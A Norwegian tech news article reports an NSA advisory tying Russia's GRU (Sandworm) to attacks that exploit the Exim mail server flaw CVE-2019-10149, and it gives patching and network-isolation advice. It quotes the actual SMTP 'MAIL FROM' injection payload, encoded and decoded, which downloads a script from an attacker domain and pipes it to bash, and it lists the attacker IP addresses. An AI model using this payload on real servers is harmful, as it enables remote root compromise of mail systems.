Exim Internett Mailer

NSA advarer om GRU-angrep mot e-postservere

Utnytter svært alvorlig sårbarhet.

Sandworm-kampanjen er knyttet til russiske GRU av blant annet NSA.
Sandworm-kampanjen er knyttet til russiske GRU av blant annet NSA. (Illustrasjonsfoto: Flickr/xiquinhosilva (CC BY 2.0), ISight Partners. Montasje: Digi.no)

Utnytter svært alvorlig sårbarhet.

Sikkerhetsaktører er ofte forsiktige med å påstå hvem som står bak IT-angrep, siden dette kan være vanskelig å fastslå fordi angriperne ofte utfører angrepene via en serie med uskyldige parter.

Derfor er det noe oppsiktsvekkende at NSA (National Security Agency) nå retter fingeren rett mot det russiske Hoveddirektoratet i Generalstaben (på russisk forkortet GU, men fortsatt mest kjent som GRU – altså den militære etterretningstjenesten) i forbindelse med en serie angrep mot virksomheter som benytter e-postserverprogramvaren Exim Internett Mailer. Angrepene skal ha pågått i alle fall siden august i fjor.

Ikke bare identifiserer NSA den russiske tjenesten, men tilsynelatende også det fysiske kontoret som benyttes. For det refereres til «GRU Main Center for Special Technologies (GTsST), field post number 74455», som ifølge NSA står bak en kampanje som offentlig kalles for «Sandworm» etter tidligere funn av flere referanser til science fiction-klassikeren Dune i både skadevare og tilhørende URL-er brukt av angripernes kommando- og kontrollservere.

Les også

Har vært kjent i nesten et år

I angrepene utnyttes en kjent sårbarhet i Exim, som Digi.no omtalte allerede for nesten et år siden. Dessverre er det fortsatt mange som ikke jevnlig installerer sikkerhetsoppdateringer. Dette gjør det mulig for ondsinnede å utnytte sårbarhetene i lang tid.

Den aktuelle sårbarheten (CVE-2019-10149) gjør det mulig å oppnå full root-tilgang på det sårbare systemet bare ved å sende det en spesielt utformet e-postmelding. I praksis får angriperne da alle muligheter til å kontrollere serveren, inkludert å installere annen programvare, å overvåke og manipulere sending og mottak av e-post, og potensielt også å få tilgang til andre datamaskiner.

Kommandoene kan inkluderes i «MAIL FROM»-feltet i SMTP-meldinger.

MAIL FROM:<${run{\x2Fbin\x2Fsh\tc\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20http\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be>

Dekodet blir dette:
/bin/sh -c «exec /usr/bin/wget -O – http://hostapp.be/script1.sh | bash»

I angrepene som utføres av Sandworm, blir det lastet ned et skript fra et domene som aktøren bak kontrollerer. Dette skriptet oppretter privilegerte brukere, skrur av innstillinger knyttet til nettverkssikkerhet, åpner SSH-tjenesten for mer tilgang og kjører flere andre skript som åpner for ytterligere utnyttelse.

Belgisk domene

Hostapp.be skal være et slikt domene. Domenet er i dag parkert hos GoDaddy, men er stadig registrert. DNS Belgium oppgir ikke uten videre hvem som har registrert domenet. Også IP-adressene 95.216.13.196 og 103.94.157.5 skal ha blitt brukt.

NSA kommer med flere råd til dem som har Exim-baserte e-posttjenester. Det viktigste rådet er selvfølgelig å installere sikkerhetsoppdateringene som tilbys via Linux-distribusjonen som Exim kjøres i, eventuelt å laste ned den nyeste versjonen og installere denne. Den aktuelle sårbarheten ble fjernet i versjon 4.93, men den kan i enkelte distribusjoner også ha blitt fjernet i versjoner med lavere versjonsnummer.

Les også

Mange potensielt sårbare servere i Norge

Et søk med Shodan viser at rundt halvparten av de nesten 5 millioner Exim-serverne som er tilgjengelige via internett, benytter versjon 4.93 eller nyere. Resten benytter eldre og potensielt sårbare utgaver.

Det er drøyt 6100 internetteksponerte Exim-servere i Norge. Rundt 3500 av disse benytter en eldre versjon av programvaren enn versjon 4.93.

NSA anbefaler for øvrig også bruk av inntrengningsvern, slik som Snort, og at alle servere som er eksponert på internett, er plassert i en demilitarisert sone (DMZ), isolert fra mer følsomme, interne systemer.

Les også

Kommentarer (2)

Kommentarer (2)
Til toppen